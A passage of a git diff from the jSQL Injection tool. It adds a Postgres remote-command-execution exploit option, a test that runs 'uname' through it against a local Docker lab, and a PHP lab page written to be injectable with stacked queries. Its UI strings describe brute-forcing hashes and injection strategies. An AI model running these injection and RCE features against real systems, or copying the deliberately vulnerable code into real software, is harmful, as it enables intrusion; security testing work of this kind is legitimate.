\ Speed up process by excluding characters from the search. BRUTEFORCE_MIN_LABEL = Size min. BRUTEFORCE_MAX_LABEL = max. BRUTEFORCE_MIN_TOOLTIP = \ Minimum length of searched string
\ Speed up process by specifying the minimum length to search. BRUTEFORCE_MAX_TOOLTIP = \ Maximum length of searched string
\ Speed up process by specifying the maximum length to search. BRUTEFORCE_RUN_BUTTON_LABEL = Start BRUTEFORCE_RUN_BUTTON_TOOLTIP = \ Brute force provided hash to find original text
\ Hash the selected chars range and compare with provided BRUTEFORCE_RESULT = Result of brute force processing BRUTEFORCE_CHARACTER_RANGE = Select character range like lower case and numeric characters BRUTEFORCE_INCORRECT_MIN_MAX_LENGTH = Minimum length must be equal or lower than Maximum length BRUTEFORCE_STOP = Stop BRUTEFORCE_EMPTY_HASH = Missing hash BRUTEFORCE_CURRENT_STRING = Current string BRUTEFORCE_CURRENT_HASH = Current hash BRUTEFORCE_POSSIBILITIES = Number of possibilities BRUTEFORCE_CHECKED_HASHES = Checked hashes BRUTEFORCE_ESTIMATED = Estimated hashes left BRUTEFORCE_PERSECOND = Per second BRUTEFORCE_TRAVERSING_REMAINING = Traversing remaining BRUTEFORCE_DAYS = days BRUTEFORCE_HOURS = h BRUTEFORCE_MINUTES = min BRUTEFORCE_SECONDS = s BRUTEFORCE_PERCENT_DONE = Percent done BRUTEFORCE_ABORTED = Brute force aborted BRUTEFORCE_FOUND_HASH = Hash found BRUTEFORCE_HASH_NOT_FOUND = Hash not found # CODER CODER_TAB = Encoding CODER_TOOLTIP = Encode or decode a string CODER_INPUT = Type a text to convert CODER_RESULT = Result of conversion # SCAN SCANLIST_TAB = Batch scan SCANLIST_TOOLTIP = Test injection on multiple targets SCAN_RUN_BUTTON_STOP = Stop SCAN_RUN_BUTTON_LABEL = Start SCAN_RUN_BUTTON_TOOLTIP = Scan common public URL for injection # ADDRESSBAR FIELD_QUERYSTRING_TOOLTIP = \ Server URL
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside path or params (e.g. path?inject=*&q=).\
\ NTLM and Negotiate Authentication (NTLM is also set in Preferences)
\ Set NTLM and Negotiate authentication in URL.
\ E.g. http://domain\\user:pass@127.0.0.1/path?q=\ FIELD_REQUEST_TOOLTIP = \ Request parameters
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. inject=*&q=).\ FIELD_HEADER_TOOLTIP = \ Header parameters like Cookie, User-Agent and Referer
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. Inject:*\\r\\nQ:).
\ Set cookies with Cookie: key1=value1;key2=.
\ Define Basic authent with user:pass encoded in base64.
\ E.g. user:pass => dXNlcjpwYXNz, set Authorization: Basic dXNlcjpwYXNz\ METHOD_QUERYSTRING_TOOLTIP = Inject using URL parameters METHOD_REQUEST_TOOLTIP = Inject using Request parameters METHOD_HEADER_TOOLTIP = Inject using Header parameters METHOD_CUSTOM_TOOLTIP = Set user defined HTTP method.
\ A valid method is limited to chars:
\ !#$%&'*+-.^_`|~0123456789
\ abcdefghijklmnopqrstuvwxyz
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ\ BUTTON_START_TOOLTIP = Start injection BUTTON_STOP_TOOLTIP = Stop injection BUTTON_STOPPING_TOOLTIP = Stopping... BUTTON_ADVANCED = Advanced DIALOG_NEW_INJECTION_TITLE = New injection DIALOG_NEW_INJECTION_TEXT = Start a new injection? STRATEGY_TIME_TOOLTIP = \ Slowest and least reliable method
\ Create 5s delay when query statement is false.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_BLIND_TOOLTIP = \ Slow and reliable method
\ Create response A when query statement is true, response B otherwise.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_MULTIBIT_TOOLTIP = \ Slow and reliable method 3 times faster than Blind
\ Require 8 pages mapped to distinct id.
\ Read multiple bits for each character's ASCII code (3 URL calls). STRATEGY_ERROR_TOOLTIP = \ Fast and accurate method
\ Read data directly from source page. STRATEGY_STACK_TOOLTIP = \ Fastest and accurate method though less common
\ Read large data directly from source page. STRATEGY_UNION_TOOLTIP = \ Fastest and accurate method
\ Read large data directly from source page. # MENUBAR MENUBAR_COMMUNITY = Community MENUBAR_COMMUNITY_REPORTISSUE = Report issue or bug MENUBAR_COMMUNITY_HELPTRANSLATE = I help translate jSQL into MENUBAR_COMMUNITY_ANOTHERLANGUAGE = another language... MENUBAR_HELP = Help MENUBAR_HELP_UPDATE = Check for Updates MENUBAR_HELP_ABOUT = About jSQL Injection MENUBAR_APPEARANCE = Appearance MENUBAR_THEMES = Themes MENUBAR_WINDOWS = Windows MENUBAR_LANGUAGE = Language MENUBAR_SQL_ENGINE = SQL Engine MENUBAR_VIEW = Show View MENUBAR_PANEL = Show Consoles MENUBAR_PREFERENCES = Preferences MENUBAR_EDIT = Edit MENUBAR_FILE = File MENUBAR_FILE_EXIT = Exit MENUBAR_FILE_SAVETABAS = Save Tab As... SAVE_TAB_CONFIRM_TITLE = Confirm Save As SAVE_TAB_CONFIRM_LABEL = already exists.\nDo you want to replace it ? TRANSLATION_TEXT = Contribute and translate parts of jSQL Injection into %s
\ Help the community and translate some buttons, menus, tabs and tooltips into %s,\ then click on Send to forward your changes to the developer on GitHub.
",\ E.g. for French, change CONTEXT_MENU_COPY = Copy to CONTEXT_MENU_COPY = Copier,\ then click on Send. The list only displays what needs to be translated \ and is updated as soon as the developer processes your request.\ TRANSLATION_SEND = Send TRANSLATION_TITLE = Translate to TRANSLATION_PLACEHOLDER = Text remaining to translate TRANSLATION_PROGRESS = translated into # CONSOLE CONSOLE_MAIN_LABEL = Console CONSOLE_MAIN_TOOLTIP = General information CONSOLE_CHUNK_LABEL = Chunk CONSOLE_CHUNK_TOOLTIP = Raw data extracted CONSOLE_BINARY_LABEL = Binary CONSOLE_BINARY_TOOLTIP = Blind/Time chars extracted CONSOLE_NETWORK_LABEL = Network CONSOLE_NETWORK_TOOLTIP = URL calls logs CONSOLE_JAVA_LABEL = Java CONSOLE_JAVA_TOOLTIP = Java thrown exception NETWORK_TAB_URL_LABEL = URL NETWORK_TAB_HEADERS_LABEL = Headers NETWORK_TAB_PARAMS_LABEL = Request NETWORK_TAB_RESPONSE_LABEL = Response NETWORK_TAB_SOURCE_LABEL = Source NETWORK_TAB_PREVIEW_LABEL = Preview NETWORK_LINE_PLACEHOLDER_URL = Request URL NETWORK_LINE_PLACEHOLDER_HEADERS = Request headers NETWORK_LINE_PLACEHOLDER_REQUEST = Request body NETWORK_LINE_PLACEHOLDER_RESPONSE = Response headers NETWORK_LINE_PLACEHOLDER_SOURCE = Page source NETWORK_LINE_PLACEHOLDER_PREVIEW = Page rendering NETWORK_TAB_URL_COLUMN = URL NETWORK_TAB_SIZE_COLUMN = Size # LOGGER LOG_START_INJECTION = Starting new injection LOG_CONNECTION_TEST = Connection test... LOG_USING_INSERTION_CHARACTER = Using character insertion LOG_USING_DATABASE_TYPE = Using LOG_DATABASE_TYPE_FORCED_BY_USER = Database forced to LOG_DATABASE_TYPE_NOT_FOUND = Database unknown, forcing to LOG_VULNERABLE = Vulnerable to LOG_CHECKING_STRATEGY = Checking strategy LOG_CHECKING = Checking LOG_USING_STRATEGY = Using strategy LOG_FETCHING_INFORMATIONS = Fetching metadata... LOG_FETCHING_DATABASES = Fetching databases... LOG_DONE = Done LOG_DB_METADATA_INCORRECT = Incorrect or incomplete data LOG_DB_METADATA_WARN = Processing but failure is expected LOG_LIST_VALUES_INCOMPLETE = Incomplete row found LOG_LIST_VALUES_TOO_LONG = Row too long at # LOG_ADMIN_UNKNOWN_PROTOCOL = Unknown URL protocol LOG_ADMIN_NO_PROTOCOL = Undefined URL protocol, forcing to [http://] LOG_I18N_TEXT_NOT_FOUND = Language file not found, text to translate loaded from local LOG_IP_ADDRESS_CHECK = Checking ip address... LOG_IP_ADDRESS_IS = Your public IP address is # LIST LIST_NEW_VALUE = New Value(s)... LIST_CUT = Cut LIST_PASTE = Paste LIST_DELETE = Delete LIST_RESTORE_DEFAULT = Restore default LIST_ADD_VALUE_OK = Ok LIST_ADD_VALUE_CANCEL = Cancel LIST_ADD_VALUE_TITLE = Add Value(s) LIST_ADD_VALUE_LABEL = Add new value(s) to the list, a value per line.
Or you can copy/paste directly from your clipboard to the list. LIST_EXPORT_TITLE = Export... LIST_EXPORT_CONFIRM_LABEL = already exists.\nDo you want to replace it? LIST_EXPORT_CONFIRM_TITLE = Confirm Export LIST_IMPORT_CONFIRM_REPLACE = Replace LIST_IMPORT_CONFIRM_ADD = Add LIST_IMPORT_CONFIRM_LABEL = Replace list or add to current location? LIST_IMPORT_CONFIRM_TITLE = Import... LIST_IMPORT_ERROR_TITLE = Import Error LIST_IMPORT_ERROR_LABEL = Unsupported file format, use text file only # SQLENGINE SQLENGINE_STANDARD = Default SQLENGINE_ZIP = Zip SQLENGINE_DIOS = Dios SQLENGINE_STRUCTURE = Structure SQLENGINE_DATABASES = Database SQLENGINE_TABLES = Tables SQLENGINE_COLUMNS = Columns SQLENGINE_ROWS = Rows SQLENGINE_FIELD = Field SQLENGINE_FIELDS_SEPARATOR = Fields Separator SQLENGINE_METADATA = Metadata SQLENGINE_STRATEGY = Strategy SQLENGINE_STACK = Stack SQLENGINE_UNION = Union SQLENGINE_ERROR = Error SQLENGINE_BOOLEAN = Binary SQLENGINE_FINGERPRINTING = Fingerprint SQLENGINE_CONFIGURATION = Configuration SQLENGINE_ORDER_BY = Order by SQLENGINE_CHARACTERS_SLIDINGWINDOW = Char Sliding Window SQLENGINE_ROWS_SLIDINGWINDOW = Rows Sliding Window SQLENGINE_CAPACITY = Capacity SQLENGINE_CALIBRATOR = Calibrator SQLENGINE_FAILSAFE = Failsafe SQLENGINE_END_COMMENT = End comment SQLENGINE_LIMIT_START_INDEX = Limit start index SQLENGINE_FILE = File # OTHER UPDATE_EXCEPTION = \ An error occurred while checking updates, download the latest version from official website:\n\ https://github.com/ron190/jsql-injection/releases UPDATE_NEW_VERSION = A new version of jSQL Injection is available at https://github.com/ron190/jsql-injection/releases UPDATE_UPTODATE = jSQL Injection is up-to-date UPDATE_LOADING = Checking updates... ABOUT_WINDOW_TITLE = About ABOUT_WEBPAGE = Webpage ABOUT_CLOSE = Close PREFERENCES_PROXY = Proxy PREFERENCES_USEPROXY = Use a proxy PREFERENCES_PROXYADDRESS = Proxy address PREFERENCES_PROXYPORT = Proxy port PREFERENCES_AUTHENT = Authentication PREFERENCES_AUTHENT_USER = Username PREFERENCES_AUTHENT_PASS = Password PREFERENCES_CHECKUPDATE = Check update at startup PREFERENCES_REPORT_EXCEPTIONS = Report unhandled exceptions PREFERENCES_FOLLOW_REDIRECTIONS = Follow HTTP redirections PREFERENCES_CHECKIP = Check your IP PREFERENCES_APPLY = Apply \ No newline at end of file diff --git a/model/src/test/java/com/test/AbstractTestSuite.java b/model/src/test/java/com/test/AbstractTestSuite.java index cc77bb975e..08b61fba5f 100644 --- a/model/src/test/java/com/test/AbstractTestSuite.java +++ b/model/src/test/java/com/test/AbstractTestSuite.java @@ -4,7 +4,6 @@ import com.jsql.model.bean.database.Column; import com.jsql.model.bean.database.Database; import com.jsql.model.bean.database.Table; -import com.jsql.model.exception.InjectionFailureException; import com.jsql.model.exception.JSqlException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java b/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java new file mode 100644 index 0000000000..bbb71a1fc3 --- /dev/null +++ b/model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java @@ -0,0 +1,47 @@ +package com.test.vendor.postgres; + +import com.jsql.model.InjectionModel; +import com.jsql.model.accessible.ExploitMethod; +import com.jsql.model.exception.JSqlException; +import com.jsql.view.terminal.SystemOutTerminal; +import org.junit.jupiter.api.Assertions; +import org.junitpioneer.jupiter.RetryingTest; + +import java.util.UUID; + +public class PostgresExploitRceSuiteIT extends ConcretePostgresSuiteIT { + + @Override + public void setupInjection() throws Exception { + InjectionModel model = new InjectionModel(); + this.injectionModel = model; + + model.subscribe(new SystemOutTerminal()); + + model.getMediatorUtils().getParameterUtil().initQueryString( + "http://jsql-lamp:8079/php/get-pg.php?id=" + ); + + model + .getMediatorUtils() + .getPreferencesUtil() + .withIsStrategyBlindDisabled(true) + .withIsStrategyTimeDisabled(true); + + model + .getMediatorUtils() + .getConnectionUtil() + .withMethodInjection(model.getMediatorMethod().getQuery()) + .withTypeRequest("GET"); + + model.beginInjection(); + } + + @RetryingTest(3) + public void exploitUdfAuto() throws JSqlException { + this.injectionModel.getUdfAccess().createExploitRcePostgres(ExploitMethod.AUTO); + String resultCommand = this.injectionModel.getUdfAccess().runCommandRcePostgres("uname", UUID.randomUUID()); + LOGGER.info("rce: found {}, to find {}", resultCommand.trim(), "Linux"); + Assertions.assertTrue(resultCommand.trim().contains("Linux")); + } +} diff --git a/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java b/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java index ab73747d62..92c1d3d58f 100644 --- a/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java +++ b/model/src/test/java/com/test/vendor/sqlite/SqliteExploitWebSuiteIT.java @@ -43,7 +43,7 @@ public void setupInjection() throws Exception { } @RetryingTest(3) - public void exploitWebAuto() throws JSqlException { + public void exploitWebAuto() { var urlSuccess = this.injectionModel.getResourceAccess().createExploitWebSqlite("/var/www/html/", StringUtils.EMPTY); String resultCommand = this.injectionModel.getResourceAccess().runWebShell( "uname", diff --git a/model/src/test/resources/docker/Dockerfile.lamp b/model/src/test/resources/docker/Dockerfile.lamp index a27d83a448..96586a0099 100644 --- a/model/src/test/resources/docker/Dockerfile.lamp +++ b/model/src/test/resources/docker/Dockerfile.lamp @@ -2,12 +2,11 @@ FROM ubuntu:18.04 ENV MYSQL_ROOT_PASSWORD password ENV POSTGRES_USER postgres ENV POSTGRES_PASSWORD postgres -RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y dos2unix php php-mysql libapache2-mod-php mysql-server postgresql php-pgsql php-sqlite3 +RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y dos2unix php php-mysql libapache2-mod-php mysql-server postgresql php-pgsql php-sqlite3 postgresql-plpython3 EXPOSE 8079 3308 6000 COPY ./lamp/ /var/www/html/ RUN chmod 777 /var/www/html/ -# required by sqlite write shell -RUN chmod 777 /var/www/html/php/ +RUN chmod 777 /var/www/html/php/ # required by sqlite write shell RUN chmod +x /var/www/html/start-script.sh RUN dos2unix /var/www/html/start-script.sh ENTRYPOINT ["/var/www/html/start-script.sh"] \ No newline at end of file diff --git a/model/src/test/resources/docker/lamp/php/get-pg.php b/model/src/test/resources/docker/lamp/php/get-pg.php index c603c82534..58368ca521 100644 --- a/model/src/test/resources/docker/lamp/php/get-pg.php +++ b/model/src/test/resources/docker/lamp/php/get-pg.php @@ -1,6 +1,9 @@ query("SELECT '1' FROM (select 1)x where '1'={$_GET['id']}") as $row) { - echo "
  • " . join(',', $row) . "
    • "; +$array = explode(";", "SELECT '1' FROM (select 1)x where '1'={$_GET['id']}"); +foreach ($array as $item) { + foreach($db->query($item) as $row) { + echo "
  • " . join(',', $row) . "
    • "; + } } \ No newline at end of file diff --git a/model/src/test/resources/docker/lamp/start-script.sh b/model/src/test/resources/docker/lamp/start-script.sh index 9c0ad72092..6a636e9531 100644 --- a/model/src/test/resources/docker/lamp/start-script.sh +++ b/model/src/test/resources/docker/lamp/start-script.sh @@ -29,7 +29,5 @@ su postgres -c ' ' echo "Listen 8079" >> /etc/apache2/ports.conf -sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/apache2/php.ini -sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/cli/php.ini - +sed -i 's/^;extension=sqlite3/extension=sqlite3/' /etc/php/7.2/cli/php.ini /etc/php/7.2/apache2/php.ini apache2ctl -D FOREGROUND \ No newline at end of file diff --git a/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java b/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java index 9a00eb5718..be6df2a6ac 100644 --- a/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java +++ b/view/src/main/java/com/jsql/view/swing/action/ActionSaveTab.java @@ -43,14 +43,14 @@ public ActionSaveTab() { // Unhandled NoSuchMethodError #82561 on constructor: NoSuchMethodError // Unhandled InternalError #93015 on constructor: InvocationTargetException // Unhandled NullPointerException #95805 on constructor: desktop null on Windows + // Unhandled IllegalArgumentException #95985 on constructor: Comparison method violates its general contract! try { this.replaceFileChooser = new ReplaceFileChooser( MediatorHelper.model().getMediatorUtils().getPreferencesUtil().getPathFile() ); - } catch (NoSuchMethodError | InternalError | NullPointerException e) { - LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Internal error in JFileChooser: {}", e.getMessage()); - LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Please verify your system and the error stacktrace in tab Java"); - LOGGER.log(LogLevelUtil.CONSOLE_JAVA, "Internal error", e); + } catch (IllegalArgumentException | NoSuchMethodError | InternalError | NullPointerException e) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Internal error in JFileChooser, verify your system and see stacktrace in tab Java: {}", e.getMessage()); + LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e); } this.putValue(Action.ACCELERATOR_KEY, KeyStroke.getKeyStroke(KeyEvent.VK_S, InputEvent.CTRL_DOWN_MASK)); this.putValue(Action.MNEMONIC_KEY, KeyEvent.VK_S); diff --git a/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java b/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java index 6990f23ee4..b184a166ed 100644 --- a/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java +++ b/view/src/main/java/com/jsql/view/swing/dialog/translate/Language.java @@ -29,7 +29,7 @@ public enum Language { TA("Tamil", "ta", UiUtil.ICON_FLAG_LK), SE("Swedish", "se", UiUtil.ICON_FLAG_SE), FI("Finnish", "fi", UiUtil.ICON_FLAG_FI), - OT("another language", "unknown", null); + OT("another language", "unknown", new ImageIcon()); private final String nameEnglish; // required for default logging and english modal translate into private final ImageIcon flag; diff --git a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java similarity index 82% rename from view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java rename to view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java index 182791166f..9cc12e884c 100644 --- a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRce.java +++ b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRceOracle.java @@ -18,17 +18,17 @@ /** * Create a new tab for the terminal. */ -public class AddTabExploitRce extends CreateTabHelper implements InteractionCommand { +public class AddTabExploitRceOracle extends CreateTabHelper implements InteractionCommand { /** * @param interactionParams The local path and url for the shell */ - public AddTabExploitRce(Object[] interactionParams) { + public AddTabExploitRceOracle(Object[] interactionParams) { // nothing } @Override public void execute() { - SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRce()); + SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRceOracle()); } } diff --git a/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java new file mode 100644 index 0000000000..42735deb82 --- /dev/null +++ b/view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java @@ -0,0 +1,34 @@ +/******************************************************************************* + * Copyhacked (H) 2012-2025. + * This program and the accompanying materials + * are made available under no term at all, use it like + * you want, but share and discuss it + * every time possible with every body. + * + * Contributors: + * ron190 at ymail dot com - initial implementation + ******************************************************************************/ +package com.jsql.view.swing.interaction; + +import com.jsql.view.interaction.InteractionCommand; +import com.jsql.view.swing.util.MediatorHelper; + +import javax.swing.*; + +/** + * Create a new tab for the terminal. + */ +public class AddTabExploitRcePostgres extends CreateTabHelper implements InteractionCommand { + + /** + * @param interactionParams The local path and url for the shell + */ + public AddTabExploitRcePostgres(Object[] interactionParams) { + // nothing + } + + @Override + public void execute() { + SwingUtilities.invokeLater(() -> MediatorHelper.tabResults().addTabExploitRcePostgres()); + } +} diff --git a/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java b/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java index f45b41b7a1..45e2d7cd16 100644 --- a/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java +++ b/view/src/main/java/com/jsql/view/swing/manager/ManagerExploit.java @@ -53,17 +53,19 @@ public class ManagerExploit extends AbstractManagerList { private final AtomicReference netshare = new AtomicReference<>(); protected final JTextField textfieldUrlShell; - public static final String EXPLOIT_UDF = "EXPLOIT_UDF"; + public static final String EXPLOIT_RCE_ORACLE = "EXPLOIT_RCE_ORACLE"; + public static final String EXPLOIT_RCE_POSTGRES = "EXPLOIT_RCE_POSTGRES"; + public static final String EXPLOIT_UDF_MYSQL = "EXPLOIT_UDF_MYSQL"; public static final String EXPLOIT_WEB_MYSQL = "EXPLOIT_WEB_MYSQL"; public static final String EXPLOIT_WEB_SQLITE = "EXPLOIT_WEB_SQLITE"; public static final String EXPLOIT_SQL_MYSQL = "EXPLOIT_SQL_MYSQL"; public static final String EXPLOIT_UPLOAD_MYSQL = "EXPLOIT_UPLOAD_MYSQL"; public static final String EXPLOIT_UPLOAD_SQLITE = "EXPLOIT_UPLOAD_SQLITE"; - public static final String EXPLOIT_RCE = "EXPLOIT_RCE"; private final JComboBox comboBoxExploitTypes = new JComboBox<>(new Object[]{ - new ModelItemType(ManagerExploit.EXPLOIT_UDF, "EXPLOIT_UDF_TOOLTIP"), - new ModelItemType(ManagerExploit.EXPLOIT_RCE, "EXPLOIT_RCE_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_UDF_MYSQL, "EXPLOIT_UDF_MYSQL_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_RCE_ORACLE, "EXPLOIT_RCE_ORACLE_TOOLTIP"), + new ModelItemType(ManagerExploit.EXPLOIT_RCE_POSTGRES, "EXPLOIT_RCE_POSTGRES_TOOLTIP"), ComboBoxMethodRenderer.SEPARATOR, new ModelItemType(ManagerExploit.EXPLOIT_WEB_MYSQL, "EXPLOIT_WEB_MYSQL_TOOLTIP"), new ModelItemType(ManagerExploit.EXPLOIT_SQL_MYSQL, "EXPLOIT_SQL_MYSQL_TOOLTIP"), @@ -151,7 +153,11 @@ public JToolTip createToolTip() { Arrays.asList(this.username.get(), this.password.get(), this.scrollListPaths, this.textfieldUrlShell) .forEach(component -> component.setVisible(false)); ModelItemType selectedItem = (ModelItemType) e.getItem(); - if (!Arrays.asList(ManagerExploit.EXPLOIT_UDF, ManagerExploit.EXPLOIT_RCE).contains(selectedItem.getKeyLabel())) { + if (!Arrays.asList( + ManagerExploit.EXPLOIT_UDF_MYSQL, + ManagerExploit.EXPLOIT_RCE_POSTGRES, + ManagerExploit.EXPLOIT_RCE_ORACLE + ).contains(selectedItem.getKeyLabel())) { this.scrollListPaths.setVisible(true); this.textfieldUrlShell.setVisible(true); if (ManagerExploit.EXPLOIT_SQL_MYSQL.equals(selectedItem.getKeyLabel())) { @@ -235,10 +241,14 @@ public ActionExploit(JComboBox comboBoxExploitTypes) { public void actionPerformed(ActionEvent evt) { var modelSelectItem = (ModelItemType) this.comboBoxExploitTypes.getSelectedItem(); var labelSelectItem = Objects.requireNonNull(modelSelectItem).getKeyLabel(); - if (Arrays.asList(ManagerExploit.EXPLOIT_UDF, ManagerExploit.EXPLOIT_RCE).contains(labelSelectItem)) { + if (Arrays.asList( + ManagerExploit.EXPLOIT_UDF_MYSQL, + ManagerExploit.EXPLOIT_RCE_POSTGRES, + ManagerExploit.EXPLOIT_RCE_ORACLE + ).contains(labelSelectItem)) { new SwingWorker<>() { @Override - protected Object doInBackground() { Thread.currentThread().setName("SwingWorkerExploitUdf"); + protected Object doInBackground() { Thread.currentThread().setName("SwingWorkerExploit"); ActionExploit.this.start(null, null, null); return null; } @@ -257,7 +267,7 @@ public void actionPerformed(ActionEvent evt) { } if ( Arrays.asList( - ManagerExploit.EXPLOIT_SQL_MYSQL, ManagerExploit.EXPLOIT_UPLOAD_MYSQL, ManagerExploit.EXPLOIT_WEB_MYSQL, ManagerExploit.EXPLOIT_UDF + ManagerExploit.EXPLOIT_SQL_MYSQL, ManagerExploit.EXPLOIT_UPLOAD_MYSQL, ManagerExploit.EXPLOIT_WEB_MYSQL, ManagerExploit.EXPLOIT_UDF_MYSQL ).contains(labelSelectItem) && MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getMysql() ) { @@ -270,7 +280,13 @@ public void actionPerformed(ActionEvent evt) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose a SQLite target instead", MediatorHelper.model().getMediatorVendor().getVendor()); return; } else if ( - ManagerExploit.EXPLOIT_RCE.equals(labelSelectItem) + ManagerExploit.EXPLOIT_RCE_POSTGRES.equals(labelSelectItem) + && MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getPostgres() + ) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose a Postgres target instead", MediatorHelper.model().getMediatorVendor().getVendor()); + return; + } else if ( + ManagerExploit.EXPLOIT_RCE_ORACLE.equals(labelSelectItem) && MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getOracle() ) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose an Oracle target instead", MediatorHelper.model().getMediatorVendor().getVendor()); @@ -356,10 +372,12 @@ protected void createPayload(String remotePathFolder, String urlShell, File file } var modelItemType = Objects.requireNonNull((ModelItemType) this.comboBoxExploitTypes.getSelectedItem()); - if (ManagerExploit.EXPLOIT_UDF.equals(modelItemType.getKeyLabel())) { + if (ManagerExploit.EXPLOIT_UDF_MYSQL.equals(modelItemType.getKeyLabel())) { MediatorHelper.model().getUdfAccess().createUdf(pathNetshare, exploitMethod); - } else if (ManagerExploit.EXPLOIT_RCE.equals(modelItemType.getKeyLabel())) { - MediatorHelper.model().getUdfAccess().createExploitRce(exploitMethod); + } else if (ManagerExploit.EXPLOIT_RCE_ORACLE.equals(modelItemType.getKeyLabel())) { + MediatorHelper.model().getUdfAccess().createExploitRceOracle(exploitMethod); + } else if (ManagerExploit.EXPLOIT_RCE_POSTGRES.equals(modelItemType.getKeyLabel())) { + MediatorHelper.model().getUdfAccess().createExploitRcePostgres(exploitMethod); } else if (ManagerExploit.EXPLOIT_WEB_MYSQL.equals(modelItemType.getKeyLabel())) { MediatorHelper.model().getResourceAccess().createExploitWebMysql( remotePathFolder, diff --git a/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java b/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java index ba9e43e685..4b3a9afe0d 100644 --- a/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java +++ b/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java @@ -14,7 +14,6 @@ import org.fife.ui.rtextarea.RTextScrollPane; import javax.swing.*; -import java.awt.*; import java.util.AbstractMap.SimpleEntry; import java.util.Arrays; import java.util.stream.Stream; diff --git a/view/src/main/java/com/jsql/view/swing/tab/TabResults.java b/view/src/main/java/com/jsql/view/swing/tab/TabResults.java index 06ec650cc3..66fe0630f5 100644 --- a/view/src/main/java/com/jsql/view/swing/tab/TabResults.java +++ b/view/src/main/java/com/jsql/view/swing/tab/TabResults.java @@ -18,10 +18,7 @@ import com.jsql.view.swing.action.ActionCloseTabResult; import com.jsql.view.swing.action.HotkeyUtil; import com.jsql.view.swing.popupmenu.JPopupMenuText; -import com.jsql.view.swing.terminal.ExploitRce; -import com.jsql.view.swing.terminal.ExploitSql; -import com.jsql.view.swing.terminal.ExploitUdf; -import com.jsql.view.swing.terminal.ExploitWeb; +import com.jsql.view.swing.terminal.*; import com.jsql.view.swing.tab.dnd.DnDTabbedPane; import com.jsql.view.swing.tab.dnd.TabTransferHandler; import com.jsql.view.swing.table.PanelTable; @@ -164,10 +161,30 @@ public void addTabExploitUdf() { } } - public void addTabExploitRce() { + public void addTabExploitRceOracle() { try { var terminalID = UUID.randomUUID(); - var terminal = new ExploitRce(terminalID); + var terminal = new ExploitRceOracle(terminalID); + MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal); + + JScrollPane scroller = new JScrollPane(terminal); + this.addTab("RCE shell", scroller); + this.setSelectedComponent(scroller); // Focus on the new tab + + var header = new TabHeader("RCE shell", UiUtil.TERMINAL.getIcon()); + this.setTabComponentAt(this.indexOfComponent(scroller), header); + terminal.requestFocusInWindow(); + + this.updateUI(); // required: light, open/close prefs, dark => light artifacts + } catch (MalformedURLException | URISyntaxException e) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, TabResults.TAB_EXPLOIT_FAILURE_INCORRECT_URL, e); + } + } + + public void addTabExploitRcePostgres() { + try { + var terminalID = UUID.randomUUID(); + var terminal = new ExploitRcePostgres(terminalID); MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal); JScrollPane scroller = new JScrollPane(terminal); diff --git a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java similarity index 64% rename from view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java rename to 